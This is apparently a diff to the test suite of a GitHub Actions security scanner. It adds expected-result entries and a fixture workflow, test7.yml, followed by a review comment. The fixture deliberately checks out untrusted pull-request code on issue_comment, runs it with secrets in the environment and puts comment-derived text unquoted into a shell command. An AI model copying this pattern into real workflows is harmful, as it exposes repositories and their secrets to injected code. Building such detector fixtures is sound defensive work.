.github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | +| .github/workflows/poisonable_steps.yml:17:14:17:40 | python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:17:14:17:40 | python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | +| .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:18:14:18:50 | echo foo; python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | +| .github/workflows/poisonable_steps.yml:18:14:18:50 | echo foo; python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:18:14:18:50 | echo foo; python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | +| .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:19:14:19:29 | pnpm run test:ct | .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | +| .github/workflows/poisonable_steps.yml:19:14:19:29 | pnpm run test:ct | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:19:14:19:29 | pnpm run test:ct | .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | +| .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:20:14:20:73 | pip install nbformat && python scripts/generate_notebooks.py | .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | +| .github/workflows/poisonable_steps.yml:20:14:20:73 | pip install nbformat && python scripts/generate_notebooks.py | 
.github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:20:14:20:73 | pip install nbformat && python scripts/generate_notebooks.py | .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | +| .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:21:14:21:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | +| .github/workflows/poisonable_steps.yml:21:14:21:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:21:14:21:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | +| .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:22:14:22:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | +| .github/workflows/poisonable_steps.yml:22:14:22:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:22:14:22:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | +| .github/workflows/poisonable_steps.yml:23:9:23:93 | Run Step | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:23:14:23:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push 
| +| .github/workflows/poisonable_steps.yml:23:14:23:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:23:14:23:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:23:9:23:93 | Run Step | | .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:1:40:53 | on: push | | .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:1:40:53 | on: push | | .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:5:1:8 | push | 
@@ -438,6 +569,45 @@ cfgNodes | .github/workflows/multiline.yml:79:14:84:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | | .github/workflows/multiline.yml:85:9:89:29 | Run Step | | .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/poisonable_steps.yml:1:1:23:93 | enter on: push | +| .github/workflows/poisonable_steps.yml:1:1:23:93 | exit on: push | +| .github/workflows/poisonable_steps.yml:1:1:23:93 | exit on: push (normal) | +| .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | +| .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | +| .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | +| .github/workflows/poisonable_steps.yml:8:9:9:6 | Run Step | +| .github/workflows/poisonable_steps.yml:8:14:8:32 | . venv/bin/activate | +| .github/workflows/poisonable_steps.yml:9:9:10:6 | Run Step | +| .github/workflows/poisonable_steps.yml:9:14:9:42 | echo foo; . venv/bin/activate | +| .github/workflows/poisonable_steps.yml:10:9:11:6 | Run Step | +| .github/workflows/poisonable_steps.yml:10:14:10:41 | echo foo;. venv/bin/activate | +| .github/workflows/poisonable_steps.yml:11:9:12:6 | Run Step | +| .github/workflows/poisonable_steps.yml:11:14:11:42 | echo foo \|. 
venv/bin/activate | +| .github/workflows/poisonable_steps.yml:12:9:13:6 | Run Step | +| .github/workflows/poisonable_steps.yml:12:14:12:32 | ./venv/bin/activate | +| .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | +| .github/workflows/poisonable_steps.yml:13:14:13:36 | sh venv/bin/activate.sh | +| .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | +| .github/workflows/poisonable_steps.yml:14:14:14:44 | echo $(sh venv/bin/activate.sh) | +| .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | +| .github/workflows/poisonable_steps.yml:15:14:15:56 | echo foo; sh venv/bin/activate.sh; echo bar | +| .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | +| .github/workflows/poisonable_steps.yml:16:14:16:56 | echo foo \| sh venv/bin/activate.sh > output | +| .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | +| .github/workflows/poisonable_steps.yml:17:14:17:40 | python venv/bin/activate.py | +| .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | +| .github/workflows/poisonable_steps.yml:18:14:18:50 | echo foo; python venv/bin/activate.py | +| .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | +| .github/workflows/poisonable_steps.yml:19:14:19:29 | pnpm run test:ct | +| .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | +| .github/workflows/poisonable_steps.yml:20:14:20:73 | pip install nbformat && python scripts/generate_notebooks.py | +| .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | +| .github/workflows/poisonable_steps.yml:21:14:21:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | +| .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | +| .github/workflows/poisonable_steps.yml:22:14:22:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | +| .github/workflows/poisonable_steps.yml:23:9:23:93 | Run Step | +| .github/workflows/poisonable_steps.yml:23:14:23:92 | bundle run exec ruby scripts/generate_theme.rb --outfile 
js/storybook/theme.css | | .github/workflows/test.yml:1:1:40:53 | enter on: push | | .github/workflows/test.yml:1:1:40:53 | exit on: push | | .github/workflows/test.yml:1:1:40:53 | exit on: push (normal) | 
@@ -516,6 +686,41 @@ dfNodes | .github/workflows/multiline.yml:79:14:84:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | | .github/workflows/multiline.yml:85:9:89:29 | Run Step | | .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | +| .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | +| .github/workflows/poisonable_steps.yml:8:9:9:6 | Run Step | +| .github/workflows/poisonable_steps.yml:8:14:8:32 | . venv/bin/activate | +| .github/workflows/poisonable_steps.yml:9:9:10:6 | Run Step | +| .github/workflows/poisonable_steps.yml:9:14:9:42 | echo foo; . venv/bin/activate | +| .github/workflows/poisonable_steps.yml:10:9:11:6 | Run Step | +| .github/workflows/poisonable_steps.yml:10:14:10:41 | echo foo;. venv/bin/activate | +| .github/workflows/poisonable_steps.yml:11:9:12:6 | Run Step | +| .github/workflows/poisonable_steps.yml:11:14:11:42 | echo foo \|. 
venv/bin/activate | +| .github/workflows/poisonable_steps.yml:12:9:13:6 | Run Step | +| .github/workflows/poisonable_steps.yml:12:14:12:32 | ./venv/bin/activate | +| .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | +| .github/workflows/poisonable_steps.yml:13:14:13:36 | sh venv/bin/activate.sh | +| .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | +| .github/workflows/poisonable_steps.yml:14:14:14:44 | echo $(sh venv/bin/activate.sh) | +| .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | +| .github/workflows/poisonable_steps.yml:15:14:15:56 | echo foo; sh venv/bin/activate.sh; echo bar | +| .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | +| .github/workflows/poisonable_steps.yml:16:14:16:56 | echo foo \| sh venv/bin/activate.sh > output | +| .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | +| .github/workflows/poisonable_steps.yml:17:14:17:40 | python venv/bin/activate.py | +| .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | +| .github/workflows/poisonable_steps.yml:18:14:18:50 | echo foo; python venv/bin/activate.py | +| .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | +| .github/workflows/poisonable_steps.yml:19:14:19:29 | pnpm run test:ct | +| .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | +| .github/workflows/poisonable_steps.yml:20:14:20:73 | pip install nbformat && python scripts/generate_notebooks.py | +| .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | +| .github/workflows/poisonable_steps.yml:21:14:21:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | +| .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | +| .github/workflows/poisonable_steps.yml:22:14:22:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | +| .github/workflows/poisonable_steps.yml:23:9:23:93 | Run Step | +| .github/workflows/poisonable_steps.yml:23:14:23:92 | bundle run exec ruby scripts/generate_theme.rb --outfile 
js/storybook/theme.css | | .github/workflows/test.yml:5:5:31:2 | Job: job1 | | .github/workflows/test.yml:8:7:10:4 | Job outputs node | | .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | 
@@ -595,6 +800,41 @@ nodeLocations | .github/workflows/multiline.yml:79:14:84:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:79:14:84:29 | .github/workflows/multiline.yml@79:14:84:29 | | .github/workflows/multiline.yml:85:9:89:29 | Run Step | .github/workflows/multiline.yml:85:9:89:29 | .github/workflows/multiline.yml@85:9:89:29 | | .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:86:14:89:29 | .github/workflows/multiline.yml@86:14:89:29 | +| .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | .github/workflows/poisonable_steps.yml:5:5:23:93 | .github/workflows/poisonable_steps.yml@5:5:23:93 | +| .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | .github/workflows/poisonable_steps.yml:7:9:8:6 | .github/workflows/poisonable_steps.yml@7:9:8:6 | +| .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | .github/workflows/poisonable_steps.yml:7:14:7:30 | .github/workflows/poisonable_steps.yml@7:14:7:30 | +| .github/workflows/poisonable_steps.yml:8:9:9:6 | Run Step | .github/workflows/poisonable_steps.yml:8:9:9:6 | .github/workflows/poisonable_steps.yml@8:9:9:6 | +| .github/workflows/poisonable_steps.yml:8:14:8:32 | . venv/bin/activate | .github/workflows/poisonable_steps.yml:8:14:8:32 | .github/workflows/poisonable_steps.yml@8:14:8:32 | +| .github/workflows/poisonable_steps.yml:9:9:10:6 | Run Step | .github/workflows/poisonable_steps.yml:9:9:10:6 | .github/workflows/poisonable_steps.yml@9:9:10:6 | +| .github/workflows/poisonable_steps.yml:9:14:9:42 | echo foo; . venv/bin/activate | .github/workflows/poisonable_steps.yml:9:14:9:42 | .github/workflows/poisonable_steps.yml@9:14:9:42 | +| .github/workflows/poisonable_steps.yml:10:9:11:6 | Run Step | .github/workflows/poisonable_steps.yml:10:9:11:6 | .github/workflows/poisonable_steps.yml@10:9:11:6 | +| .github/workflows/poisonable_steps.yml:10:14:10:41 | echo foo;. 
venv/bin/activate | .github/workflows/poisonable_steps.yml:10:14:10:41 | .github/workflows/poisonable_steps.yml@10:14:10:41 | +| .github/workflows/poisonable_steps.yml:11:9:12:6 | Run Step | .github/workflows/poisonable_steps.yml:11:9:12:6 | .github/workflows/poisonable_steps.yml@11:9:12:6 | +| .github/workflows/poisonable_steps.yml:11:14:11:42 | echo foo \|. venv/bin/activate | .github/workflows/poisonable_steps.yml:11:14:11:42 | .github/workflows/poisonable_steps.yml@11:14:11:42 | +| .github/workflows/poisonable_steps.yml:12:9:13:6 | Run Step | .github/workflows/poisonable_steps.yml:12:9:13:6 | .github/workflows/poisonable_steps.yml@12:9:13:6 | +| .github/workflows/poisonable_steps.yml:12:14:12:32 | ./venv/bin/activate | .github/workflows/poisonable_steps.yml:12:14:12:32 | .github/workflows/poisonable_steps.yml@12:14:12:32 | +| .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | .github/workflows/poisonable_steps.yml:13:9:14:6 | .github/workflows/poisonable_steps.yml@13:9:14:6 | +| .github/workflows/poisonable_steps.yml:13:14:13:36 | sh venv/bin/activate.sh | .github/workflows/poisonable_steps.yml:13:14:13:36 | .github/workflows/poisonable_steps.yml@13:14:13:36 | +| .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | .github/workflows/poisonable_steps.yml:14:9:15:6 | .github/workflows/poisonable_steps.yml@14:9:15:6 | +| .github/workflows/poisonable_steps.yml:14:14:14:44 | echo $(sh venv/bin/activate.sh) | .github/workflows/poisonable_steps.yml:14:14:14:44 | .github/workflows/poisonable_steps.yml@14:14:14:44 | +| .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | .github/workflows/poisonable_steps.yml:15:9:16:6 | .github/workflows/poisonable_steps.yml@15:9:16:6 | +| .github/workflows/poisonable_steps.yml:15:14:15:56 | echo foo; sh venv/bin/activate.sh; echo bar | .github/workflows/poisonable_steps.yml:15:14:15:56 | .github/workflows/poisonable_steps.yml@15:14:15:56 | +| .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | 
.github/workflows/poisonable_steps.yml:16:9:17:6 | .github/workflows/poisonable_steps.yml@16:9:17:6 | +| .github/workflows/poisonable_steps.yml:16:14:16:56 | echo foo \| sh venv/bin/activate.sh > output | .github/workflows/poisonable_steps.yml:16:14:16:56 | .github/workflows/poisonable_steps.yml@16:14:16:56 | +| .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | .github/workflows/poisonable_steps.yml:17:9:18:6 | .github/workflows/poisonable_steps.yml@17:9:18:6 | +| .github/workflows/poisonable_steps.yml:17:14:17:40 | python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:17:14:17:40 | .github/workflows/poisonable_steps.yml@17:14:17:40 | +| .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | .github/workflows/poisonable_steps.yml:18:9:19:6 | .github/workflows/poisonable_steps.yml@18:9:19:6 | +| .github/workflows/poisonable_steps.yml:18:14:18:50 | echo foo; python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:18:14:18:50 | .github/workflows/poisonable_steps.yml@18:14:18:50 | +| .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | .github/workflows/poisonable_steps.yml:19:9:20:6 | .github/workflows/poisonable_steps.yml@19:9:20:6 | +| .github/workflows/poisonable_steps.yml:19:14:19:29 | pnpm run test:ct | .github/workflows/poisonable_steps.yml:19:14:19:29 | .github/workflows/poisonable_steps.yml@19:14:19:29 | +| .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | .github/workflows/poisonable_steps.yml:20:9:21:6 | .github/workflows/poisonable_steps.yml@20:9:21:6 | +| .github/workflows/poisonable_steps.yml:20:14:20:73 | pip install nbformat && python scripts/generate_notebooks.py | .github/workflows/poisonable_steps.yml:20:14:20:73 | .github/workflows/poisonable_steps.yml@20:14:20:73 | +| .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | .github/workflows/poisonable_steps.yml:21:9:22:6 | .github/workflows/poisonable_steps.yml@21:9:22:6 | +| .github/workflows/poisonable_steps.yml:21:14:21:78 
| python scripts/generate_theme.py --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:21:14:21:78 | .github/workflows/poisonable_steps.yml@21:14:21:78 | +| .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | .github/workflows/poisonable_steps.yml:22:9:23:6 | .github/workflows/poisonable_steps.yml@22:9:23:6 | +| .github/workflows/poisonable_steps.yml:22:14:22:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:22:14:22:76 | .github/workflows/poisonable_steps.yml@22:14:22:76 | +| .github/workflows/poisonable_steps.yml:23:9:23:93 | Run Step | .github/workflows/poisonable_steps.yml:23:9:23:93 | .github/workflows/poisonable_steps.yml@23:9:23:93 | +| .github/workflows/poisonable_steps.yml:23:14:23:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:23:14:23:92 | .github/workflows/poisonable_steps.yml@23:14:23:92 | | .github/workflows/test.yml:5:5:31:2 | Job: job1 | .github/workflows/test.yml:5:5:31:2 | .github/workflows/test.yml@5:5:31:2 | | .github/workflows/test.yml:8:7:10:4 | Job outputs node | .github/workflows/test.yml:8:7:10:4 | .github/workflows/test.yml@8:7:10:4 | | .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | .github/workflows/test.yml:8:20:8:50 | .github/workflows/test.yml@8:20:8:50 | @@ -615,6 +855,7 @@ nodeLocations scopes | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | | .github/workflows/test.yml:1:1:40:53 | on: push | sources | ahmadnassri/action-changed-files | * | output.files | filename | manual | diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/test7.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/test7.yml new file mode 100644 index 000000000000..44f5602ee061 --- /dev/null 
+++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/test7.yml
@@ -0,0 +1,58 @@
+name: Benchmark
+
+on:
+ issue_comment:
+ types: [created]
+
+env:
+ TURBO_TOKEN: ${{ secrets.TURBO_TOKEN }}
+ TURBO_TEAM: ${{ secrets.TURBO_TEAM }}
+ FORCE_COLOR: true
+
+jobs:
+ benchmark:
+ if: ${{ github.repository_owner == 'foo' && github.event.issue.pull_request && startsWith(github.event.comment.body, '!bench') }}
+ runs-on: ubuntu-latest
+ permissions:
+ contents: read
+ steps:
+ - uses: actions/checkout@v4
+ with:
+ persist-credentials: false
+ ref: refs/pull/${{ github.event.issue.number }}/head
+
+ - name: Setup PNPM
+ uses: pnpm/action-setup@v3
+
+ - name: Setup Node
+ uses: actions/setup-node@v4
+ with:
+ node-version: 18
+ cache: "pnpm"
+
+ - name: Install dependencies
+ run: pnpm install
+
+ - name: Build Packages
+ run: pnpm run build
+
+ - name: Get bench command
+ id: bench-command
+ env:
+ # protects from untrusted user input and command injection
+ COMMENT: ${{ github.event.comment.body }}
+ run: |
+ benchcmd=$(echo "$COMMENT" | grep '!bench' | awk -F ' ' '{print $2}')
+ echo "bench=$benchcmd" >> $GITHUB_OUTPUT
+ shell: bash
+
+ - name: Run benchmark
+ id: benchmark-pr
+ run: |
+ result=$(pnpm run --silent benchmark ${{ steps.bench-command.outputs.bench }})
+ processed=$(node ./benchmark/ci-helper.js "$result")
+ echo "BENCH_RESULT<> $GITHUB_OUTPUT
+ echo "### PR Benchmark" >> $GITHUB_OUTPUT
+ echo "$processed" >> $GITHUB_OUTPUT
+ echo "BENCHEOF" >> $GITHUB_OUTPUT
+ shell: bash
diff --git a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected
index d95cf6fef090..124a26b1d47a 100644
--- a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected
+++ b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected
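Review bot: The new fixture test7.yml says nothing about which finding it is meant to exercise, and it actually contains two distinct ones: the `issue_comment`-triggered checkout of `refs/pull/${{ github.event.issue.number }}/head` followed by `pnpm install` / `pnpm run build` (the untrusted-checkout path that the updated UntrustedCheckoutCritical.expected now records), and, in the `Run benchmark` step, `${{ steps.bench-command.outputs.bench }}` spliced unquoted into the shell line `result=$(pnpm run --silent benchmark …)`, which undoes the protection the `COMMENT:` env indirection in the previous step was added for. A header comment such as `# Expected: untrusted checkout of a PR head on issue_comment followed by local pnpm install/build; also expression injection of a comment-derived step output in 'Run benchmark'` would keep the two cases from silently drifting if either query's output changes. It is also worth stating that `persist-credentials: false` and `contents: read` do not contain the workflow-level `TURBO_TOKEN` / `TURBO_TEAM` env, which is inherited by the pnpm steps executing PR-controlled code, and that the `if:` guard checks the repository owner and comment prefix but not the commenter's permissions. The line `echo "BENCH_RESULT<> $GITHUB_OUTPUT` looks truncated in this rendering (presumably a `<<BENCHEOF` heredoc marker was lost); confirm the committed file is intact.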
@@ -16,4 +16,5 @@ | .github/workflows/label_trusted_checkout.yml:24:7:27:21 | Uses Step | Unpinned 3rd party Action 'label_trusted_checkout.yml' step $@ uses 'fakerepo/comment-on-pr' with ref '1', not a pinned commit hash | .github/workflows/label_trusted_checkout.yml:24:7:27:21 | Uses Step | Uses Step | | .github/workflows/level0.yml:36:9:39:6 | Uses Step | Unpinned 3rd party Action 'Poutine Level 0' step $@ uses 'rlespinasse/github-slug-action' with ref '4', not a pinned commit hash | .github/workflows/level0.yml:36:9:39:6 | Uses Step | Uses Step | | .github/workflows/mend.yml:29:9:33:28 | Uses Step | Unpinned 3rd party Action 'Test' step $@ uses 'ruby/setup-ruby' with ref '1', not a pinned commit hash | .github/workflows/mend.yml:29:9:33:28 | Uses Step | Uses Step | +| .github/workflows/test7.yml:24:9:27:6 | Uses Step | Unpinned 3rd party Action 'Benchmark' step $@ uses 'pnpm/action-setup' with ref '3', not a pinned commit hash | .github/workflows/test7.yml:24:9:27:6 | Uses Step | Uses Step | | .github/workflows/unpinned_tags.yml:10:7:11:4 | Uses Step | Unpinned 3rd party Action 'unpinned_tags.yml' step $@ uses 'foo/bar' with ref '1', not a pinned commit hash | .github/workflows/unpinned_tags.yml:10:7:11:4 | Uses Step | Uses Step | diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected index 78e2afa2747a..f2d229e80bb5 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected 
@@ -304,6 +304,27 @@ edges
 | .github/workflows/test6.yml:19:9:39:6 | Uses Step | .github/workflows/test6.yml:39:9:43:6 | Run Step |
 | .github/workflows/test6.yml:19:9:39:6 | Uses Step | .github/workflows/test6.yml:43:9:45:52 | Run Step |
 | .github/workflows/test6.yml:39:9:43:6 | Run Step | .github/workflows/test6.yml:43:9:45:52 | Run Step |
+| .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:24:9:27:6 | Uses Step |
+| .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:27:9:33:6 | Uses Step |
+| .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:33:9:36:6 | Run Step |
+| .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:36:9:39:6 | Run Step |
+| .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:39:9:49:6 | Run Step: bench-command |
+| .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr |
+| .github/workflows/test7.yml:24:9:27:6 | Uses Step | .github/workflows/test7.yml:27:9:33:6 | Uses Step |
+| .github/workflows/test7.yml:24:9:27:6 | Uses Step | .github/workflows/test7.yml:33:9:36:6 | Run Step |
+| .github/workflows/test7.yml:24:9:27:6 | Uses Step | .github/workflows/test7.yml:36:9:39:6 | Run Step |
+| .github/workflows/test7.yml:24:9:27:6 | Uses Step | .github/workflows/test7.yml:39:9:49:6 | Run Step: bench-command |
+| .github/workflows/test7.yml:24:9:27:6 | Uses Step | .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr |
+| .github/workflows/test7.yml:27:9:33:6 | Uses Step | .github/workflows/test7.yml:33:9:36:6 | Run Step |
+| .github/workflows/test7.yml:27:9:33:6 | Uses Step | .github/workflows/test7.yml:36:9:39:6 | Run Step |
+| .github/workflows/test7.yml:27:9:33:6 | Uses Step | .github/workflows/test7.yml:39:9:49:6 | Run Step: bench-command |
+| .github/workflows/test7.yml:27:9:33:6 | Uses Step | .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr |
+| .github/workflows/test7.yml:33:9:36:6 | Run Step | .github/workflows/test7.yml:36:9:39:6 | Run Step |
+| .github/workflows/test7.yml:33:9:36:6 | Run Step | .github/workflows/test7.yml:39:9:49:6 | Run Step: bench-command |
+| .github/workflows/test7.yml:33:9:36:6 | Run Step | .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr |
+| .github/workflows/test7.yml:36:9:39:6 | Run Step | .github/workflows/test7.yml:39:9:49:6 | Run Step: bench-command |
+| .github/workflows/test7.yml:36:9:39:6 | Run Step | .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr |
+| .github/workflows/test7.yml:39:9:49:6 | Run Step: bench-command | .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr |
 | .github/workflows/test.yml:13:9:14:6 | Uses Step | .github/workflows/test.yml:14:9:25:6 | Run Step |
 | .github/workflows/test.yml:13:9:14:6 | Uses Step | .github/workflows/test.yml:25:9:33:6 | Run Step |
 | .github/workflows/test.yml:13:9:14:6 | Uses Step | .github/workflows/test.yml:33:9:37:34 | Run Step |
@@ -335,5 +356,8 @@ edges
 | .github/workflows/test5.yml:32:9:34:2 | Run Step | .github/workflows/test5.yml:28:9:32:6 | Uses Step | .github/workflows/test5.yml:32:9:34:2 | Run Step | Execution of untrusted code on a privileged workflow. |
 | .github/workflows/test5.yml:58:9:60:2 | Run Step | .github/workflows/test5.yml:54:9:58:6 | Uses Step | .github/workflows/test5.yml:58:9:60:2 | Run Step | Execution of untrusted code on a privileged workflow. |
 | .github/workflows/test5.yml:68:9:68:43 | Run Step | .github/workflows/test5.yml:64:9:68:6 | Uses Step | .github/workflows/test5.yml:68:9:68:43 | Run Step | Execution of untrusted code on a privileged workflow. |
+| .github/workflows/test7.yml:33:9:36:6 | Run Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:33:9:36:6 | Run Step | Execution of untrusted code on a privileged workflow. |
+| .github/workflows/test7.yml:36:9:39:6 | Run Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:36:9:39:6 | Run Step | Execution of untrusted code on a privileged workflow. |
+| .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | Execution of untrusted code on a privileged workflow. |
 | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | .github/workflows/untrusted_checkout.yml:10:9:13:6 | Uses Step | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | Execution of untrusted code on a privileged workflow. |
 | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | .github/workflows/untrusted_checkout.yml:13:9:16:6 | Uses Step | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | Execution of untrusted code on a privileged workflow. |
From 56b70981ae823bbe19fd50e6cd9985d6b9f6e21f Mon Sep 17 00:00:00 2001
